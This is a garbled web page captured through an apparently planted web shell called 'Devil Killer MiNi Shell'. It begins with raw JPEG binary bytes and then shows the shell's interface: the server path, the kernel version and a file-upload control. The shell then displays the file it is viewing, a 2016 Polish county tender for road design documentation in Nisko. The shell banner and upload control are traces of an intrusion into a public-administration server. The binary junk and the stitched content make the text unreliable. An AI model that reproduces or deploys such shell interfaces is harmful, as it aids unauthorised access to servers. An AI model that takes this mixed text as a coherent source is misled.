JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160127/18696-N-2016.html

<p class="kh_header"><b>Nisko: Opracowanie dokumentacji związanej z uzyskaniem dofinansowania projektu w ramach Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2014  2020 w ramach Osi Priorytetowej V. Infrastruktura komunikacyjna Działanie 5 1 Infrastruktura drogowa   projekty z zakresu dróg lokalnych na zadanie pn Przebudowa drogi powiatowej  Nr 1048R Zdziary  Banachy łączącej węzeł drogi ekspresowej S19 Zdziary z drogą wojewódzką nr 858.</b><br>
<b>Numer ogłoszenia: 18696 - 2016; data zamieszczenia: 27.01.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Niżański , Pl. Wolności 2, 37-400 Nisko, woj. podkarpackie, tel. 015 8412057, faks 015 8412700.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji związanej z uzyskaniem dofinansowania projektu w ramach Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2014  2020 w ramach Osi Priorytetowej V. Infrastruktura komunikacyjna Działanie 5 1 Infrastruktura drogowa   projekty z zakresu dróg lokalnych na zadanie pn Przebudowa drogi powiatowej  Nr 1048R Zdziary  Banachy łączącej węzeł drogi ekspresowej S19 Zdziary z drogą wojewódzką nr 858..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji związanej z uzyskaniem dofinansowania projektu w ramach Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2014  2020 w ramach Osi Priorytetowej V Infrastruktura komunikacyjna Działanie 5 1 Infrastruktura drogowa  projekty z zakresu dróg lokalnych na zadanie pn: Przebudowa drogi powiatowej Nr 1048R Zdziary  Banachy łączącej węzeł drogi ekspresowej S19 Zdziary z drogą wojewódzką nr 858. Zakres przedmiotu zamówienia obejmuje: Opracowanie dokumentacji projektowej Zamawiający zleca wykonanie kompleksowej pełnobranżowej dokumentacji projektowej w celu podwyższenia parametrów technicznych i eksploatacyjnych istniejącej drogi powiatowej Nr 1048R Zdziary - Banachy łączącej węzeł drogi ekspresowej S19 Zdziary z drogą wojewódzką nr 858 wraz z uzyskaniem dokumentów zezwalających na rozpoczęcie robót budowlanych: decyzji o pozwoleniu na budowę/zgłoszenia wykonania robót, Zamawiający, z uwagi na niejednolitą szerokość pasa drogowego oraz różne zagospodarowanie otoczenia pasa drogowego, zakłada możliwość etapowania zadania oraz uzyskania kilku dokumentów zezwalających na rozpoczęcie robót budowlanych (oddzielnie dla każdego z etapów)  w uzgodnieniu z Zamawiającym, Odcinek 1 Zdziary  Huta Deręgowska, Odcinek 2 Huta Deręgowska  Wołoszyny,  Odcinek 3 Wołoszyny  Banachy, Wykonawca zobowiązany będzie do złożenia minimum co dwa tygodnie w siedzibie Zamawiającego materiałów świadczących o zaawansowaniu prac projektowych, Zamawiający zastrzega sobie możliwość nie pisemnej rezygnacji z poszczególnych spotkań z zachowaniem obowiązku sporządzenia ww. sprawozdania, dokumentacja projektowa opracowana zostanie zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. 2013 r. poz.1129), dołączenia do dokumentacji projektowej oświadczenie, że projekt jest wykonany zgodnie z umową, obowiązującymi przepisami techniczno-budowlanymi, normami i wytycznymi, i że został wykonany w stanie kompletnym z punktu widzenia celu, któremu ma służyć, projekt należy wykonać na podkładach  map uzgodnionych z Zamawiającym, uzyskania wszystkich koniecznych uzgodnień, warunków i opinii (m. in. KIP, decyzję o środowiskowych uwarunkowaniach z raportem OŚ według potrzeb, opinię Zespołu ds  Koordynacji Sytuowania Projektowanych Sieci Uzbrojenia Terenu, pozwolenia wodnoprawne, w tym także Zamawiającego oraz zastosować narzucone w nich wymagania w rozwiązaniach projektowych w ramach opracowania, wszystkie formułowane w imieniu Zamawiającego wnioski powinny uzyskać jego akceptację,
Wykonawca uzgodni z Zamawiającym projekt koncepcyjny drogi (plan sytuacyjny wraz  z przekrojami normalnymi, zależnie od potrzeb analiza terenowo-prawną i planistyczną), zaakceptowanie projektu koncepcyjnego przez Zamawiającego oraz uzyskanie pozytywnej oceny geometrii drogi przez Starostwo Powiatowe w Nisku jest warunkiem wykonywania dalszych prac projektowych, zaakceptowanie projektu koncepcyjnego przez Zamawiającego jest warunkiem wykonywania dalszych prac projektowych. we właściwych terminach przekazać Zmawiającemu niezbędne dokumenty, stanowiące załączniki do wniosku o dofinansowanie, np. zgłoszenie wykonania robót budowlanych - dokumentacja projektowa, ( m. in. zaświadczenie Natura 2000 - KIP itp.), Dokumentacja projektowa powinna zawierać m.in.:
 Dokumentację architektoniczno-budowlaną rozwiązań projektowych (projekt budowlano - wykonawczy) w zakresie Projekt zagospodarowania terenu, Projekt branży drogowej, Projekt odwodnienia drogi, Projekty branżowe przebudowy ewentualnych kolizji (oddzielnie każda branża). Projekt przebudowy skrzyżowań z drogami powiatowymi i wojewódzkimi, uzgodnienia wraz z pozwoleniami narzuconymi przez wydane w trakcie uzgadniania decyzjami. prognozę ruchu drogowego (ewentualnie według potrzeb pomiary ruchu pieszych, rowerzystów i ruchu samochodowego), badania niezbędne dla zaprojektowania nawierzchni drogi odpowiedniej do przeniesienia kategorii ruchu KR3, obliczoną na dwudziestoletni okres eksploatacji. Ostateczne ustalenie kategorii ruchu nastąpi po przeanalizowaniu pomiarów i prognozy ruchu, wykonanie badań nośności drogi i opracowanie projektu wzmocnienia konstrukcji drogi do żądanych wymagań (metoda badań musi być zaakceptowana przez zamawiającego), zatwierdzony projekt stałej organizacji ruchu, opracowaniu planu BIOZ, materiały o zezwoleniu na realizację inwestycji drogowej przygotować zgodnie z obowiązującymi przepisami zgodnie z Ustawa o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych z dnia 10 kwietnia 2003 r. (Dz. U. 2013 r. poz. 687).  Materiały niezbędne do złożenia wniosku o dofinansowanie zadania plan orientacyjny, plany sytuacyjne z treścią określoną przez Zamawiającego, przekroje normalne, skrócony opis techniczny,  Dokumentacja przetargowa powinna zawierać m. in przedmiar robót, opis techniczny,
kosztorys inwestorski, kosztorys ofertowy, specyfikacje techniczne,
Wykonawca zobowiązany jest do wykonania w terminie 7 dni od wezwania przez Zamawiającego aktualizacji kosztorysów inwestorskich. Wykonawca zobowiązany jest, do czasu realizacji zadania, przeprowadzać nieodpłatnie konsultacje z zewnętrznymi projektantami w zakresie dotyczącym zgodności lokalizacji infrastruktury technicznej w pasie drogowym z wykonywanym projektem przebudowy rozbudowy drogi objętym przedmiotem zamówienia. Wykonawca przekaże Zamawiającemu kompletne i zgodne z umową opracowanie projektowe na następujących nośnikach wersja papierowa (wydruki) dokumentacji projektowej (projekty budowlano wykonawcze) w 4 egzemplarzach, wersja papierowa (wydruki) dokumentacji przetargowej (skrócone opisy techniczne, przedmiary robót, kosztorysy inwestorskie z podziałem na branże, kosztorysy ofertowe z podziałem na branże, specyfikacje techniczne wykonania i odbioru robót budowlanych) w 2 egzemplarzach, wersja elektroniczna ww. dokumentacji projektowej i przetargowej w 1 egzemplarzu. Dopuszcza się tabelę elementów scalonych obejmującą wszystkie kosztorysy branżowe oraz kosztorys ofertowy w formacie edytowalnym xls lub xlsx.
Kosztorysy inwestorskie należy przekazać na osobnych płytach.
Przekazanie dokumentacji nastąpi w siedzibie Zamawiającego, w godzinach pracy Zamawiającego. Całość dokumentacji należy na roboczo uzgadniać w ZDP w Nisku. Wszystkie niezbędne poprawki uzupełnienia do w/w opracowań, jakie wynikną po ich sprawdzeniu Projektant wykona w ramach ceny zawartej umowy.	
W projekcie należy uwzględnić następujące parametry techniczne drogi klasa drogi Z,
szerokość jezdni min. 5,50 - 6,00 m, konstrukcja nawierzchni do przeniesienia ruchu KR3, obliczoną na dwudziestoletni okres eksploatacji (ostateczne ustalenie kategorii ruchu nastąpi po przeanalizowaniu pomiarów  i prognozy ruchu), pozostałe parametry drogi zgodne z Rozporządzeniem Ministra Transportu i Gospodarki Morskiej w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne  i ich usytuowanie z dnia 2 marca 1999 r. (Dz. U. z 1999 r. nr 43, poz. 430 z późn. zm.). Należy zaprojektować nawierzchnię jezdni z betonu asfaltowego. Rodzaj i kolor kostki brukowej oraz inne elementy infrastruktury (włazy studni, kratki ściekowe, elementy BRD itp.), typ oznakowania pionowego i poziomego należy zaprojektować zgodnie z wytycznymi Zamawiającego uzgodnionymi na etapie projektowym. Zaprojektować ciągi komunikacji pieszej na całej długości drogi objętej projektem i zależnie od możliwości terenowych ciągi komunikacji rowerowej. Zamawiający dopuszcza możliwość rezygnacji z potrzeby zaprojektowania części ww. ciągów ze względów terenowych. Przewidzieć korekty istniejących skrzyżowań w celu poprawy bezpieczeństwa ruchu.Należy zaprojektować bezpieczną organizację ruchu pieszego. Przewidzieć korekty istniejących przejść dla pieszych i doprojektowanie nowych w celu poprawy bezpieczeństwa ruchu, w szczególności w miejscach przystanków autobusowych. Przystanki autobusowe zaprojektować w uzgodnieniu z zamawiającym. W projekcie należy zastosować elementy poprawiające bezpieczeństwo i uspokajające ruchu, po wcześniejszym uzgodnieniu koncepcji z zamawiającym. Należy zapewnić właściwe odwodnienie pasa drogowego. Zaprojektowane odwodnienie drogi 	powinno zapewnić odbiór docelowej ilości wód opadowych z uwzględnieniem odwodnienia z dróg gminnych i wewnętrznych krzyżujących się z innymi drogami. Wyznaczenie miejsc odbioru wód opadowych i zaprojektowanie systemu odprowadzenia wód do tych odbiorników należeć będzie do Projektanta. Preferuje się odwodnienie powierzchniowe z dopuszczeniem lokalizacji kanalizacji deszczowej w miejscach gdzie wykonanie odwodnienia powierzchniowego nie jest możliwe 	lub wymaga, zdaniem Zamawiającego, nadmiernych kosztów. Zapewnić lokalizację elementów wyposażenia dróg (np. znaków drogowych, słupów oświetleniowych) w miarę możliwości poza ciągami komunikacyjnymi, tak aby zachować wymagane przepisami skrajnie.W przypadku lokalizacji studni kanalizacyjnych (istniejących i projektowanych) w jezdni włazy kanalizacji osadzić w prefabrykowanych elementach betonowych montowanych na zinwentaryzowanych studniach po wycięciu wcześniej ułożonych warstw bitumicznych. Zapewnić obsługę komunikacyjną oraz dostępność nieruchomości przyległych do drogi publicznej zgodnie z Rozporządzeniem Ministra Transportu i Gospodarki Morskiej w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie z dnia 2 marca 1999 r. jak dla dróg klasy Z. W ramach projektu należy zaprojektować zjazdy na nieruchomości sąsiadujące z drogą powiatową, uwzględniając różnice wysokościowe. Projekt powinien uwzględniać usunięcie powstałych w związku z inwestycją kolizji. W ofercie należy ująć kolizje branż infrastruktury technicznej typu linie energetyczne, telefoniczne, gazociągi, wodociągi, kanalizacja sanitarna itd. Liczba kolizji i możliwość ich uniknięcia są zależne od zaproponowanego przez Projektanta rozwiązania projektowego. Należy sądzić, że podczas opracowywania projektu drogi będą występować kolizje z infrastrukturą techniczną dla których to należy opracować projekty branżowe. Należy wskazać możliwości etapowania projektu w zakresie odcinków trasy zgodnie  z wymaganiami opisanymi w niniejszej SIWZ Opracowanie projektowe powinno być wykonane zgodnie z obowiązującymi przepisami ustawy z dnia 7 lipca 1994 r. Prawa budowlanego (Dz. U. z 2013 r. poz. 1409 z późn. zm.) oraz przepisami wykonawczymi, a w szczególności Rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012 roku, w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2012 r. poz. 462 z późn. zm.), Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz.U.2013, poz.1129), Kosztorys inwestorski powinien być sporządzony w oparciu o Rozporządzenie Ministra Infrastruktury z dnia 18 maja 2004 roku w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno użytkowym (Dz. U. Nr 130 poz.1389) w układzie zgodnym z układem pozycji cen jednostkowych wynikających z opracowanych Szczegółowych Specyfikacji Technicznych. Szczegółowe specyfikacje techniczne wykonania i odbioru robót budowlanych powinny być sporządzone na podstawie aktualnie obowiązujących norm. W każdej specyfikacji należy dokładnie określić roboty objęte daną specyfikacją. Specyfikację Techniczną Wykonania i Odbioru Robót Projektant opracuje na podstawie dokumentacji projektowej. Specyfikacja winna zawierać w szczególności zbiory wymagań, które są niezbędne do określenia standardu i jakości wykonania robót w zakresie sposobu wykonania robót budowlanych, właściwości wyrobów budowlanych oraz oceny prawidłowości wykonania poszczególnych robót. Zakres i sposób jej opracowania określa rozporządzenie Ministra Infrastruktury z dn. 02.09.2004 r. (Dz. U. z 2013 r., poz.1129). Sposób wykonania Dokumentacji
Dokumentacja winna zostać wykonana w języku polskim, zgodnie z obowiązującymi przepisami prawa, normami technicznymi, zasadami wiedzy technicznej oraz powinna być opatrzona klauzulą o kompletności i przydatności z punktu widzenia celu, któremu ma służyć.Dokumentacja winna być spójna i skoordynowana we wszystkich branżach. Ponadto zawierać będzie wymagane potwierdzenia sprawdzeń rozwiązań projektowych w zakresie wynikającym z przepisów, wymagane opinie, uzgodnienia, zgody i pozwolenia w zakresie wynikającym z przepisów, a także spis opracowań i dokumentacji składających się na komplet przedmiotu zamówienia.
Dokumentacja winna zostać sprawdzona i podpisana przez osoby posiadające wymagane uprawnienia. W projektach wykonawczych Wykonawca ujmie wszystkie roboty niezbędne do wykonawstwa robót w tym przygotowawcze i tymczasowe.
Informacje zawarte w Dokumentacji w zakresie technologii wykonania robót, doboru materiałów i urządzeń powinny określać przedmiot Umowy w sposób zgodny z ustawą Prawo Zamówień Publicznych oraz przepisów wykonawczych do tej ustawy.
Dokumentacja powinna być wykonana przez osobę posiadającą uprawnienia do projektowania dróg oraz należy dołączyć do dokumentacji zaświadczenie o przynależności projektantów do Okręgowej Izby Inżynierów Budownictwa.
Wykonawca dostarczy Zamawiającemu dokumentację wraz z oświadczeniem o kompletności oraz zgodności z Umową, obowiązującymi przepisami i normami, stanowiącymi integralną część dokumentacji projektowej. Wszelkie opłaty związane z opracowaniem dokumentacji projektowej ponosi Wykonawca.Wykonawca sprawować będzie nadzór autorski w sposób i na zasadach określonych w ustawie Prawo Budowlane z dnia 07.07.1994 r., art. 20 ust. 1 pkt 4 ppkt a i ppkt b (Dz. U. z 2013 r., poz. 1409), przy czym koszty sprawowania nadzoru autorskiego należy uwzględnić w cenie oferty Dokumentacja aplikacyjna W tym Wniosek o dofinansowanie wraz z załącznikami - zebranie informacji i przygotowanie wniosku o dofinansowanie oraz załączników do wniosku o dofinansowanie oraz innych wymaganych dokumentów zgodnie z zaleceniami Instytucji Zarządzającej Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2014-2020. Cena za przygotowanie wniosku o dofinansowanie wraz z załącznikami i innych wymaganych dokumentów nie może przekroczyć 2% ogólnej ceny za wykonanie dokumentacji projektowej.
Wniosek o dofinansowanie wraz z załącznikami należy dostarczyć w wersji papierowej 	oraz na nośniku elektronicznym w wersji WORD, PDF, XLS i XML zgodnie z wymogami określonymi w dokumentacji konkursowej. Wszystkie dokumenty Wykonawca zobowiązuje się opracować z najwyższą starannością, zgodnie z obowiązującymi przepisami prawa i zaleceniami Instytucji Zarządzającej Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2014-2020.
Wykonawca będzie zobowiązany w ramach ustalonego wynagrodzenia do  uzupełnienia, poprawienia i aktualizacji wniosku o dofinansowanie wraz załącznikami, do momentu uzyskania pozytywnej opinii z Instytucji Zarządzającej Programem oraz aktualizacji 	danych w trakcie realizacji zadania gdy będzie to niezbędne i zalecane przez IZ nie później niż w ciągu 3 dni roboczych od otrzymanego powiadomienia o konieczności uzupełnienia, poprawienia lub aktualizacji. Opracowanie musi być aktualne na dzień przekazania go do Zamawiającego. Wniosek o dofinansowanie wraz z załącznikami powinien być opracowany zgodnie z aktualną Instrukcją wypełniania wniosku o dofinansowanie realizacji projektu ze środków EFRR w ramach osi priorytetowej V. Infrastruktura komunikacyjna działanie 5.1. Infrastruktura drogowa - projekty z zakresu dróg lokalnych oraz z Instrukcją wypełniania załączników do wniosku  o dofinansowanie realizacji projektu ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2014 - 2020 w ramach osi priorytetowej V. Infrastruktura komunikacyjna działanie 5.1. Infrastruktura drogowa  projekty  z zakresu dróg lokalnych. Wniosek o dofinansowanie wraz z załącznikami sporządzić w 3 egzemplarzach i na nośniku elektronicznym w wersji edytowalnej (1 egzemplarz).
Wykonawca zobowiązany jest opracować wniosek o dofinansowanie wraz z załącznikami w sposób profesjonalny. Wykonawca gwarantuje poprawność wykonania zleconego 	opracowania. W przypadku negatywnej oceny formalnej i merytoryczno - technicznej wniosku o dofinansowanie ze względu na poprawność opracowania wniosku aplikacyjnego wraz załącznikami Wykonawca zwróci Zamawiającemu 100% kosztów przygotowania dokumentu. Wykonawca zobowiązany jest usunąć braki i poprawić błędy i nieścisłości w opracowanym wniosku o dofinansowaniu wraz z załącznikami w przypadku wykazania w trakcie oceny formalnej lub merytoryczno - technicznej braków, błędów i nieścisłości. Wykonawca usunie braki i poprawi błędy i nieścisłości na swój koszt w terminie do 3 dni roboczych licząc od dnia powiadomienia przez Zamawiającego. Studium Wykonalności - zebranie informacji i przeprowadzenie niezbędnej analizy do opracowania Studium, opracowanie analiz wraz z analizą finansowo - ekonomiczną i analizą techniczną, przygotowanie załączników do Studium oraz innych wymaganych dokumentów zgodnie z zaleceniami Instytucji Zarządzającej Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2014-2020. Studium wraz z załącznikami należy dostarczyć w wersji papierowej oraz na nośniku elektronicznym w wersji WORD, PDF, XLS i XML zgodnie z wymogami określonymi  w dokumentacji konkursowej. Dla przeprowadzonej analizy finansowej i ekonomicznej Wykonawca stworzy aktywny model finansowy wraz z formułami sporządzony w programie Microsoft Excel. Wszystkie dokumenty Wykonawca zobowiązuje się opracować z najwyższą starannością, zgodnie z obowiązującymi przepisami prawa i zaleceniami Instytucji Zarządzającej Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2014-2020.
Wykonawca będzie zobowiązany w ramach ustalonego wynagrodzenia do  uzupełnienia, poprawienia i aktualizacji Studium, do momentu uzyskania pozytywnej opinii z Instytucji 	Zarządzającej Programem oraz aktualizacji danych w trakcie realizacji zadania gdy będzie 	to niezbędne i zalecane przez IZ nie później niż w ciągu 3 dni roboczych od otrzymanego powiadomienia o konieczności uzupełnienia, poprawienia lub aktualizacji. Opracowanie musi być aktualne na dzień przekazania go do Zamawiającego. Studium wykonalności powinno być opracowane zgodnie z aktualną  Instrukcją do 	opracowania Studium wykonalności  - infrastruktura drogowa ze środków EFRR w ramach osi priorytetowej V Infrastruktura komunikacyjna działanie 5.1. Infrastruktura drogowa - projekty z zakresu dróg lokalnych.
Studium Wykonalności należy sporządzić w 3 egzemplarzach i na nośniku 	elektronicznym w wersji edytowalnej (1 egzemplarz).
Opracowane studium wykonalności będzie integralną częścią wniosku o dofinansowanie Projektu ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2014 - 2020, w ramach  osi priorytetowej V. Infrastruktura komunikacyjna działanie 5 1 Infrastruktura drogowa - projekty z zakresu dróg lokalnych z terminem składania wniosków o dofinansowanie od dnia 30.03.2016 r. do dnia 28.04.2016 r. Wykonawca zobowiązany jest wykonać Studium Wykonalności w sposób profesjonalny. Wykonawca gwarantuje poprawność wykonania zleconego 	opracowania. W przypadku negatywnej oceny merytoryczno - technicznej wniosku o dofinansowanie ze względu na poprawność opracowania Studium Wykonalności Wykonawca zwróci Zamawiającemu 100% kosztów przygotowania dokumentu. Wykonawca zobowiązany jest usunąć braki i poprawić błędy i nieścisłości w opracowanym Studium Wykonalności w przypadku wykazania w trakcie oceny formalnej lub merytoryczno - technicznej braków, błędów i nieścisłości. Wykonawca usunie braki i poprawi błędy i nieścisłości na swój koszt w terminie do 3 dni roboczych licząc od dnia powiadomienia przez Zamawiającego..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.24.20.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 18.04.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku.  Zamawiający dokona oceny spełniania warunku udziału w postępowaniu w tym zakresie na podstawie oświadczenia  o spełnianiu warunków udziału w postępowaniu. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku.  Zamawiający dokona oceny spełniania warunku udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
